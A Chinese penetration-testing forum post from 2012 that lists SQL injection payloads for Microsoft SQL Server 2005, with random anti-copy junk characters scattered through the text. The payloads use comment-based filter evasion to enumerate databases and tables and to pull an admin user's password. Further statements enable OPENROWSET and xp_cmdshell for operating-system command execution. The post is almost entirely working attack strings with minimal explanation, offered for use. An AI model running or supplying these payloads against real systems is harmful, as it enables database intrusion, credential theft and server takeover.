找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 MSsql2005注入语句
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2768|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
- J; }! g! W4 M2 C" s+ Y

9 v* N) r- f/ v( F1 c  H6 `2 l2 p* q- `
[Copy to clipboard]CODE:7 ?2 O( R6 X# E; i' P5 L  O
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--! i$ m+ K" |" h& K6 _: l) m
! r7 Z6 i" T( I9 J( D* E. ]
爆表语句,somedb部份是所要列的数据库,红色数字1累加" S0 @7 w$ Q' O; _* ^& l

* ]& ~  ^) G' C- @
/ T* d, W8 T3 P( T2 y: K) b[Copy to clipboard]CODE:# r) @8 n6 u1 @/ e$ n# b
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
0 Q0 s7 _5 }5 H- I* t9 g! t5 v7 X% t" }$ _$ b; O# C
爆字段语句,爆表admin里user='icerover'的密码段
! j5 _9 q4 T) Q7 U! U$ `
: M( d/ d2 D- Z
/ D! w+ Y$ i  ]1 J; N[Copy to clipboard]CODE:% D8 B& \# {! R1 W
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
# L* |( q) w7 ~1 [  r+ _- j$ A1 Y7 k
mssql2005默认没有开xp_cmdshell的,openrowset也不能用3 C4 J7 y# c( B
如果是sa权限,可以这样来开启5 i  q6 U1 i9 S) D4 u) u" y6 c
开启openrowset$ Y6 Q! V% `) ]! G

$ P, D/ {7 x* L" D: J- N4 l8 \7 d  g4 y" |! E$ P- h
[Copy to clipboard]CODE:
% x; \. U" n' ?  Y! s/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--5 P9 ~! K) x. h9 n0 R
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
1 ^6 {; p/ `5 T% l9 g8 H! B7 F2 o& J* I9 [4 R' E0 y
开启xp_cmdshell' B2 M5 B- |8 ^" {# Z8 t2 ]

& O4 Q. q% G8 W* n! o/ S3 p, O. \! ?" c: w! w3 u
[Copy to clipboard]CODE:* n: E4 R, A2 J: `
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
! D8 X1 N$ \( VEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--2 h. H# F* w+ `0 K! m0 U

! Q! S- W4 Q$ C; ?1 zok,over~~晚安
1 C9 P6 t6 d4 a8 `$ X
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表